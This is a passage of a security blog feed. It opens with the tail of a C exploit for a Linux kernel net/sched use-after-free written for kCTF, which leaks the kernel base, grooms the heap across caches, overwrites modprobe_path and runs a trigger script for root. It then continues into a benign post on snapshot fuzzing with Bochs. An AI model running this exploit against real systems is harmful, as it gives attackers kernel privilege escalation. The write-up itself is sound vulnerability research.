    <span class="n">system</span><span class="p">(</span><span class="s">"chmod +x trigger.sh privesc.sh"</span><span class="p">);</span>

    <span class="c1">// Spray children processes</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Spraying child pids...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">spray_children</span><span class="p">();</span>

    <span class="c1">// Check kernel version</span>
    <span class="kt">int</span> <span class="n">major</span> <span class="o">=</span> <span class="n">get_kernel_version</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">major</span> <span class="o">!=</span> <span class="mi">5</span> <span class="o">&amp;&amp;</span> <span class="n">major</span> <span class="o">!=</span> <span class="mi">6</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Wrong kernel version</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Set offsets for kernel 5</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">major</span> <span class="o">==</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">g_kernfs_addr</span> <span class="o">=</span> <span class="n">kernfs_addr_off_5</span><span class="p">;</span>
        <span class="n">g_entry_syscall_off</span> <span class="o">=</span> <span class="n">entry_syscall_off_5</span><span class="p">;</span>
        <span class="n">g_write_gadget_addr</span> <span class="o">=</span> <span class="n">write_gadget_off_5</span><span class="p">;</span>
        <span class="n">g_modprobe_addr</span> <span class="o">=</span> <span class="n">modprobe_off_5</span><span class="p">;</span>
        <span class="n">g_null_gadget_addr</span> <span class="o">=</span> <span class="n">null_gadget_off_5</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Set offsets for kernel 6</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">g_kernfs_addr</span> <span class="o">=</span> <span class="n">kernfs_addr_off_6</span><span class="p">;</span>
        <span class="n">g_entry_syscall_off</span> <span class="o">=</span> <span class="n">entry_syscall_off_6</span><span class="p">;</span>
        <span class="n">g_write_gadget_addr</span> <span class="o">=</span> <span class="n">write_gadget_off_6</span><span class="p">;</span>
        <span class="n">g_modprobe_addr</span> <span class="o">=</span> <span class="n">modprobe_off_6</span><span class="p">;</span>
        <span class="n">g_null_gadget_addr</span> <span class="o">=</span> <span class="n">null_gadget_off_6</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Make sure we have the files we need, this is just for my lab not kCTF</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"cp /usr/sbin/tc.bin /tmp/tc.bin &gt;/dev/null 2&gt;&amp;1"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"cp /usr/sbin/ip.bin /tmp/ip.bin &gt;/dev/null 2&gt;&amp;1"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"cp /usr/sbin/socat.bin /tmp/socat.bin &gt;/dev/null 2&gt;&amp;1"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"cp /usr/sbin/iptables.bin /tmp/iptables.bin &gt;/dev/null 2&gt;&amp;1"</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">num_files</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">access</span><span class="p">(</span><span class="n">required_files</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">F_OK</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"%s did not exist, exiting...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">required_files</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Determine scan start and scan end</span>
    <span class="kt">uint64_t</span> <span class="n">scan_start</span> <span class="o">=</span> <span class="n">KERNEL_LOWER_BOUND</span> <span class="o">+</span> <span class="n">g_entry_syscall_off</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">scan_end</span> <span class="o">=</span> <span class="n">KERNEL_UPPER_BOUND</span> <span class="o">+</span> <span class="n">g_entry_syscall_off</span><span class="p">;</span>

    <span class="c1">// Attempt to entry bleed the kernel base</span>
    <span class="n">g_kernel_base</span> <span class="o">=</span> <span class="n">leak_syscall_entry</span><span class="p">(</span><span class="n">scan_start</span><span class="p">,</span> <span class="n">scan_end</span><span class="p">)</span> <span class="o">-</span> <span class="n">g_entry_syscall_off</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Kernel base address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_kernel_base</span><span class="p">);</span>

    <span class="c1">// Update kernfs addr</span>
    <span class="n">g_kernfs_addr</span> <span class="o">+=</span> <span class="n">g_kernel_base</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Kernfs buffer address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_kernfs_addr</span><span class="p">);</span>

    <span class="c1">// Update arb write gadget</span>
    <span class="n">g_write_gadget_addr</span> <span class="o">+=</span> <span class="n">g_kernel_base</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Arbitrary write gadget address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_write_gadget_addr</span><span class="p">);</span>

    <span class="c1">// Update modprobe</span>
    <span class="n">g_modprobe_addr</span> <span class="o">+=</span> <span class="n">g_kernel_base</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Modprobe path address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_modprobe_addr</span><span class="p">);</span>

    <span class="c1">// Initialize the write target, we have to add 1 because /sbin/modprobe</span>
    <span class="c1">// already contains a '/' leading character that we'll retain</span>
    <span class="n">g_write_target</span> <span class="o">=</span> <span class="p">(</span><span class="n">g_modprobe_addr</span> <span class="o">-</span> <span class="n">WRITE_TARGET_OFFSET</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Update NULL gadget</span>
    <span class="n">g_null_gadget_addr</span> <span class="o">+=</span> <span class="n">g_kernel_base</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Return NULL gadget address: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_null_gadget_addr</span><span class="p">);</span>

    <span class="c1">// Get CAPs</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Doing the unshare...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">unshare_stuff</span><span class="p">();</span>

    <span class="c1">// Pin our process</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Pinning our process to core-0...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">pin_to_core_0</span><span class="p">();</span>

    <span class="c1">// Setup listener</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Starting UDP listener...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">start_udp_listener</span><span class="p">();</span>

    <span class="c1">// Allocate pipes</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Creating pipes...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">allocate_pipes</span><span class="p">();</span>

    <span class="c1">// Allocate classes 1:1 and 1:3 and give them qdiscs</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Setting up initial classes...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">setup_classes</span><span class="p">();</span>

    <span class="c1">// Execute cross-cache stage 1</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing cross-cache stage-1...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">cc_1</span><span class="p">();</span>

    <span class="c1">// Execute cross-cache stage 2</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing cross-cache stage-2...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">cc_2</span><span class="p">();</span>

    <span class="c1">// Allocate the victim class</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Allocating victim class 1:2...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class add dev lo classid 1:2 drr"</span><span class="p">);</span>

    <span class="c1">// Execute the bug to re-parent 1:3's qdisc to 1:2</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing bug to reparent qdisc to 1:2 from 1:3...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc replace dev lo parent 1:2 handle 3:0"</span><span class="p">);</span>

    <span class="c1">// Display the setup</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Displaying hierarchy setup...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class ls dev lo"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin qdisc ls"</span><span class="p">);</span>

    <span class="c1">// Enqueue packets in 1:1 and 1:2 qdiscs</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Enqueueing packets in 1:1 and 1:2...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo </span><span class="se">\"\"</span><span class="s"> | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo </span><span class="se">\"\"</span><span class="s"> | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))"</span><span class="p">);</span>

    <span class="c1">// Delete classes 1:1 and 1:2 </span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Deleting classes 1:1 and 1:2 and then cross-cache stage-3...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class delete dev lo classid 1:1"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./tc.bin class delete dev lo classid 1:2"</span><span class="p">);</span>
    <span class="n">cc_3</span><span class="p">();</span>

    <span class="c1">// Execute cross-cache stage 4</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing cross-cache stage-4...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">cc_4</span><span class="p">();</span>

    <span class="c1">// Execute cross-cache stage 5 and reclaim page with pipe writes</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Executing cross-cache stage-5 and reclaiming page...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">cc_5</span><span class="p">();</span>
    <span class="n">reclaim_page</span><span class="p">();</span>

    <span class="c1">// Overwrite modprobe path</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Overwriting modprobe path...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">overwrite_modprobe</span><span class="p">();</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Modprobe path is *probably* overwritten lol!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

    <span class="c1">// Execute trigger</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"./trigger.sh"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="kCTF" /><category term="CTF" /><category term="Kernel" /><category term="Exploit" /><summary type="html"><![CDATA[Background I’m trying to really focus this year on developing technically in a few ways. Part of that is reviewing kCTF entries. This helps me get a sense of what subsystems are producing the most bugs at the moment in the program and also keeps me up to date on buggy patterns to look for. Also I get to shamelessly steal players’ exploitation techniques as well. A lot of recent bugs have come from /net/sched so I was looking at patches for the subsystem and found a patch that claimed an exploitable UAF was possible. That patch is here. I didn’t realize at the time, but “Lion Ackermann” mentioned in the patch as the bug discoverer (and presumably exploiter) is a kCTF player.]]></summary></entry><entry><title type="html">Fuzzer Development 4: Snapshots, Code-Coverage, and Fuzzing</title><link href="https://h0mbre.github.io/Lucid_Snapshots_Coverage/" rel="alternate" type="text/html" title="Fuzzer Development 4: Snapshots, Code-Coverage, and Fuzzing" /><published>2024-06-23T00:00:00+00:00</published><updated>2024-06-23T00:00:00+00:00</updated><id>https://h0mbre.github.io/Lucid_Snapshots_Coverage</id><content type="html" xml:base="https://h0mbre.github.io/Lucid_Snapshots_Coverage/"><![CDATA[<h2 id="background">Background</h2>

<p>This is the next installment in a series of blog posts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the <a href="https://github.com/h0mbre/Lucid">Lucid repository</a>.</p>

<h2 id="introduction">Introduction</h2>
<p>Previously, we left off having implemented enough of the Linux emulation logic to get Lucid running a <code class="language-plaintext highlighter-rouge">-static-pie</code> Bochs up to its start menu. Well, we’ve accomplished a lot in the few months since then. We’ve now implemented snapshots, code-coverage feedback, and more Linux emulation logic, to the point that we can actually fuzz things! So in this post, we’ll review some of the major features that have been added to the codebase, as well as some examples of how to set the fuzzer up for fuzzing.</p>

<h2 id="snapshots">Snapshots</h2>
<p>One of the key benefits to the design of this fuzzer (thank you <a href="https://x.com/gamozolabs">Brandon Falk</a>) is that the entire state of the emulated/target system is completely encapsulated by Bochs. The appeal here is that if we can reliably record and reset Bochs’ state, we get target snapshots by default. In the future, this will benefit us when our targets affect device states, something like fuzzing a network service. So now our problem becomes, how do we, on Linux, perfectly record and reset the state of a process?</p>

<p>Well, the solution I came up with I think is very aesthetically pleasing. We need to reset the following state in Bochs:</p>
<ul>
  <li>Any writable <code class="language-plaintext highlighter-rouge">PT_LOAD</code> memory segments in the Bochs image itself</li>
  <li>Bochs’ file-table</li>
  <li>Bochs’ dynamic memory, such as heap allocations</li>
  <li>Bochs’ extended CPU state: AVX registers, floating point unit, etc</li>
  <li>Bochs’ registers</li>
</ul>

<p>Right off the bat, dynamic memory should be pretty trivial to record since we handle all calls to <code class="language-plaintext highlighter-rouge">mmap</code> ourselves in our fuzzer in the syscall emulation code. So we can pretty easily snapshot MMU state that way. This also applies to the file-table, since we also control all file I/O the same way. For now though, I haven’t implemented file-table snapshotting because for my fuzzing harness I’m using for development, Bochs doesn’t touch any files. I’ve resorted to marking files as dirty if we are fuzzing and they are touched and just panicking at that point for now. Later, we should be able to approach file snapshotting the same way we do the MMU.</p>

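<p>Extended CPU state can be saved and restored with dedicated machine instructions, such as the <code class="language-plaintext highlighter-rouge">xsave</code> and <code class="language-plaintext highlighter-rouge">xrstor</code> family.</p>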

<p>But an outstanding question for me was figuring out how to record and reset the <code class="language-plaintext highlighter-rouge">PT_LOAD</code> segments. We can’t easily track the dirtying of these pages from Linux userland because the writes happen natively. There are some common approaches to this type of problem in the fuzzing space though <em>if you want to restore these pages differentially</em>:</p>
<ul>
  <li>Mark those pages as non-writable and handle write-access faults for each page. This approach will let you know if Bochs ever uses the writable page. Once you handle a fault, you can permanently mark the page as writable and then lazily reset it each fuzzing iteration.</li>
  <li>Use some of the utilities exposed for things like the Checkpoint Restore effort in <code class="language-plaintext highlighter-rouge">/proc</code> as discussed by <a href="https://narly.me/posts/resmack-detour-full-fuzzer-experiment/">d0c s4vage</a>.</li>
</ul>
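<p>To make the first approach concrete, here is a minimal C sketch of write-fault dirty tracking. This is not what Lucid does (it resets everything wholesale, as described next), and every name in it (<code class="language-plaintext highlighter-rouge">track_region</code>, <code class="language-plaintext highlighter-rouge">on_write_fault</code>, <code class="language-plaintext highlighter-rouge">g_dirty</code>) is hypothetical. It assumes a Linux host and a single-threaded process.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <signal.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define MAX_PAGES 64

static volatile uint8_t *g_region;               // base of the tracked block
static size_t g_page_size;                       // host page size
static size_t g_num_pages;                       // pages in the tracked block
static volatile sig_atomic_t g_dirty[MAX_PAGES]; // 1 if the page was written

// Write-fault handler: record the page as dirty, then make it writable so
// the faulting store is retried and succeeds.
static void on_write_fault(int sig, siginfo_t *info, void *uctx) {
    (void)sig;
    (void)uctx;
    uintptr_t addr = (uintptr_t)info->si_addr;
    uintptr_t base = (uintptr_t)g_region;
    if (addr < base || addr >= base + g_num_pages * g_page_size)
        _exit(1); // not our block: treat it as a genuine crash
    size_t idx = (addr - base) / g_page_size;
    g_dirty[idx] = 1;
    // mprotect is not formally async-signal-safe; using it here is the
    // usual pragmatic choice for this trick on Linux.
    mprotect((void *)(base + idx * g_page_size), g_page_size,
             PROT_READ | PROT_WRITE);
}

// Map `num_pages` of anonymous memory, install the fault handler, and
// write-protect the block. Returns 0 on success, -1 on failure.
int track_region(size_t num_pages) {
    if (num_pages == 0 || num_pages > MAX_PAGES)
        return -1;
    g_page_size = (size_t)sysconf(_SC_PAGESIZE);
    g_num_pages = num_pages;

    void *p = mmap(NULL, num_pages * g_page_size, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;
    g_region = p;

    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_sigaction = on_write_fault;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGSEGV, &sa, NULL) != 0)
        return -1;

    for (size_t i = 0; i < MAX_PAGES; i++)
        g_dirty[i] = 0;
    return mprotect(p, num_pages * g_page_size, PROT_READ);
}

// Number of pages that have taken a write fault so far.
size_t count_dirty_pages(void) {
    size_t n = 0;
    for (size_t i = 0; i < g_num_pages; i++)
        n += (size_t)g_dirty[i];
    return n;
}
```

<p>After <code class="language-plaintext highlighter-rouge">track_region</code> returns, the first store to each page costs one fault and later stores to that page are free. A differential reset would then copy back only the pages flagged in <code class="language-plaintext highlighter-rouge">g_dirty</code>.</p>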

<p>Ultimately though, I decided that for simplicity’s sake, I’d just reset all the writable segments each time.</p>

<p>The real problem, however, is that Bochs’ dynamic memory allocations can be humungous because it will allocate heap memory to hold the emulated guest memory (your target system). So if you configure a guest VM with 2GB of RAM, Bochs will attempt to make a heap allocation of 2GB. This makes capturing and restoring the snapshot very expensive, as a 2GB memcpy <em>each fuzzing iteration</em> would be very costly. So I needed a way to avoid this. Bochs <em>does</em> have memory access hooks however, so I could track dirtied memory in the guest this way. This might be a future implementation if we find that our current implementation becomes a performance bottleneck.</p>

<p>In line with my project philosophy for Lucid at the moment, which is that we’re ok sacrificing performance for either introspection or architectural/implementation simplicity, I decided that there was a nice solution we could leverage given that we are the ones mapping Bochs into memory and not the kernel. As long as the ELF image’s loadable segments are ordered such that the writable segments are loaded last, the first writable segment marks the start of a block of memory that needs resetting. At this point you can think of the mapping like this in memory:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>|-------------------------------------------------------|
|            Non-Writable ELF Segments                  |
|-------------------------------------------------------|   &lt;-- Start of memory that we need to record and restore
|              Writable ELF Segments                    |
|-------------------------------------------------------|
</code></pre></div></div>

<p>This is nice for us because what we actually have now is the start of a <em>contiguous block of writable memory</em> that we need to restore each fuzzing iteration. The rest of the mutable memory that Bochs will affect that we care about for snapshots can be arbitrarily mapped, let’s think about it:</p>
<ul>
  <li>Extended state save area for Bochs: Yep, we control where this is mapped, we can map this right up against the last writable ELF segment with <code class="language-plaintext highlighter-rouge">mmap</code> and <code class="language-plaintext highlighter-rouge">MAP_FIXED</code>. Now our contiguous block contains the extended state as well.</li>
  <li>MMU Dynamic Memory (Brk, Mmap): Yep, we control this because we pre-allocate dynamic memory and then use these syscalls as basically bump allocator APIs so this is also now part of our contiguous block.</li>
</ul>

<p>So now, we can conceptualize the entire block of memory that we need to track for snapshots as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>|-------------------------------------------------------|
|            Non-Writable ELF Segments                  |
|-------------------------------------------------------|   &lt;-- Start of memory that we need to record and restore
|              Writable ELF Segments                    |
|-------------------------------------------------------|
|             Bochs Extended CPU State                  |
|-------------------------------------------------------|
|                Bochs MMU/Brk Pool                     |
|-------------------------------------------------------|   &lt;-- End of memory that we need to record and restore
</code></pre></div></div>
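<p>The “MMU/Brk pool” part of that layout works because the pool is reserved once and then handed out bump-allocator style. Here is a rough C sketch of that idea. The type and function names (<code class="language-plaintext highlighter-rouge">bump_pool</code>, <code class="language-plaintext highlighter-rouge">bump_alloc</code>, <code class="language-plaintext highlighter-rouge">bump_restore</code>) and the 4 KiB page size are assumptions for illustration, not Lucid’s actual MMU code.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define POOL_PAGE_SIZE ((size_t)0x1000) // assumed 4 KiB pages

// Bookkeeping for a pre-reserved pool that sits inside the contiguous
// snapshot block. Only addresses are tracked here; no memory is touched.
typedef struct {
    uintptr_t base; // first address of the pool
    size_t size;    // total bytes reserved for the pool
    uintptr_t next; // next address that will be handed out
} bump_pool;

void bump_init(bump_pool *p, uintptr_t base, size_t size) {
    p->base = base;
    p->size = size;
    p->next = base;
}

// Hand out `len` bytes rounded up to whole pages.
// Returns the start address, or 0 if the request cannot be satisfied.
uintptr_t bump_alloc(bump_pool *p, size_t len) {
    if (len == 0)
        return 0;
    size_t rounded = (len + POOL_PAGE_SIZE - 1) & ~(POOL_PAGE_SIZE - 1);
    if (rounded < len)
        return 0; // rounding overflowed
    size_t used = (size_t)(p->next - p->base);
    if (rounded > p->size - used)
        return 0; // pool exhausted
    uintptr_t addr = p->next;
    p->next += rounded;
    return addr;
}

// Snapshot restore for the allocator itself: copy the saved bookkeeping
// back over the dirty bookkeeping.
void bump_restore(bump_pool *p, const bump_pool *saved) {
    *p = *saved;
}
```

<p>Because nothing is ever unmapped or moved, every allocation Bochs makes lands inside the same pre-reserved range, which is what keeps the whole thing contiguous.</p>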

<p>So why do we care about the writable memory being compact and contiguous like this? We still face the issue where the MMU/Brk pool of memory is way too large to do a giant <code class="language-plaintext highlighter-rouge">memcpy</code> each fuzzing iteration. Our solution must either use differential resets (ie, only reset what was dirty) or it must find a new way to do wholesale restoration since <code class="language-plaintext highlighter-rouge">memcpy</code> is not good enough.</p>

<p>Without wanting to noodle over differential resets and trying to focus on simplicity, I settled on an efficient way to use the concept of contiguous memory to our advantage for resetting the entire block without relying on <code class="language-plaintext highlighter-rouge">memcpy</code>. We can cache the snapshot contents in memory for the duration of the fuzzer by using Linux’s shared memory objects which are allocated with <code class="language-plaintext highlighter-rouge">libc::shm_open</code>. This is basically like opening a file that is backed by shared memory, so we won’t really trigger any disk reads or expensive file I/O when we read the contents for each snapshot restoration.</p>

<p>Next, when it’s time to restore, we can simply <code class="language-plaintext highlighter-rouge">mmap</code> that “file” overtop of the dirty contiguous block. They will have the same size, right? And we control the location of the contiguous memory block, so this makes resetting dirty memory extremely easy! It’s literally mostly just this code:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// This function will take the saved data in the shm object and just mmap it</span>
<span class="c1">// overtop of the writable memory block to restore the memory contents</span>
<span class="nd">#[inline]</span>
<span class="k">fn</span> <span class="nf">restore_memory_block</span><span class="p">(</span><span class="n">base</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">length</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">fd</span><span class="p">:</span> <span class="nb">i32</span><span class="p">)</span> <span class="k">-&gt;</span>
    <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="c1">// mmap the saved memory contents overtop of the dirty contents</span>
    <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nn">libc</span><span class="p">::</span><span class="nf">mmap</span><span class="p">(</span>
            <span class="n">base</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span>
            <span class="n">length</span><span class="p">,</span>
            <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_READ</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span><span class="p">,</span>
            <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_PRIVATE</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_FIXED</span><span class="p">,</span>
            <span class="n">fd</span><span class="p">,</span>
            <span class="mi">0</span>
        <span class="p">)</span>
    <span class="p">};</span>

    <span class="k">if</span> <span class="n">result</span> <span class="o">==</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_FAILED</span> <span class="p">||</span> <span class="n">result</span> <span class="o">!=</span> <span class="n">base</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span> <span class="p">{</span> 
        <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Failed to mmap restore snapshot"</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You just need the file descriptor for the shared memory object and you can perform the restoration for the memory contents. On my relatively old CPU and inside a VMware VM, I was able to reset this memory block roughly 18k times per second, which is definitely fast enough for a fuzzer like Lucid that will most certainly bottleneck on target emulation code. That’s not to say that we won’t have issues in the future, however. A lot of kernel time with this approach is spent destroying the pages we <code class="language-plaintext highlighter-rouge">mmap</code> overtop of if they are no longer needed and this may be a bottleneck if we scale our fuzzing up in the future. Time will tell. For now, I love how simple and easy the approach is. Shoutout to Dominik Maier and the rest of the fuzzing discord for helping me workshop the idea.</p>

<p>The second most important benefit, behind the simplicity, is that the performance is relatively constant regardless of block size. We get to take advantage of several efficient memory management optimizations of the Linux kernel and we don’t have an issue with 2GB <code class="language-plaintext highlighter-rouge">memcpy</code> operations slowing us down. With my current setup of having 64MB of guest memory allocated, this <code class="language-plaintext highlighter-rouge">shmem + mmap</code> approach was roughly 10x faster than a giant <code class="language-plaintext highlighter-rouge">memcpy</code>. With <code class="language-plaintext highlighter-rouge">shmem + mmap</code> we spend 13% of CPU time in the snapshot restoration code, compared to 96% with <code class="language-plaintext highlighter-rouge">memcpy</code>. So it works well for us right now.</p>
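<p>For readers who want to play with the record-and-restore round trip outside of Lucid, here is a small C sketch under some assumptions. It swaps in <code class="language-plaintext highlighter-rouge">memfd_create</code> for <code class="language-plaintext highlighter-rouge">shm_open</code> purely to avoid extra linker flags; both give you a memory-backed file descriptor. The function names are hypothetical and the block is assumed to be page-aligned and a multiple of the page size.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

// Allocate a page-aligned block to stand in for the contiguous writable
// region. Returns NULL on failure.
void *alloc_block(size_t length) {
    void *p = mmap(NULL, length, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}

// Record: copy the block's current contents into a memory-backed file.
// Returns the file descriptor, or -1 on failure.
int snapshot_save(const void *base, size_t length) {
    int fd = memfd_create("snapshot_sketch", 0);
    if (fd < 0)
        return -1;
    if (ftruncate(fd, (off_t)length) != 0) {
        close(fd);
        return -1;
    }
    const char *src = base;
    size_t done = 0;
    while (done < length) {
        ssize_t n = write(fd, src + done, length - done);
        if (n <= 0) {
            close(fd);
            return -1;
        }
        done += (size_t)n;
    }
    return fd;
}

// Restore: map the saved contents privately over the dirty block.
// MAP_PRIVATE means later writes to the block never reach the saved copy,
// so the same fd can be reused for every iteration.
int snapshot_restore(void *base, size_t length, int fd) {
    void *p = mmap(base, length, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_FIXED, fd, 0);
    return p == base ? 0 : -1;
}
```

<p>The one-time cost is the copy in <code class="language-plaintext highlighter-rouge">snapshot_save</code>. Each restore is then a single <code class="language-plaintext highlighter-rouge">mmap</code> call, with pages faulted in lazily as they are touched.</p>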

<p>Some other small things about snapshot restoration, we can “clone” an existing MMU, ie the one we saved during snapshot recording, to the current MMU (dirty) with something like this very trivially:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Copy the contents of an existing MMU, used for snapshot restore</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">restore</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">mmu</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Mmu</span><span class="p">)</span> <span class="p">{</span>
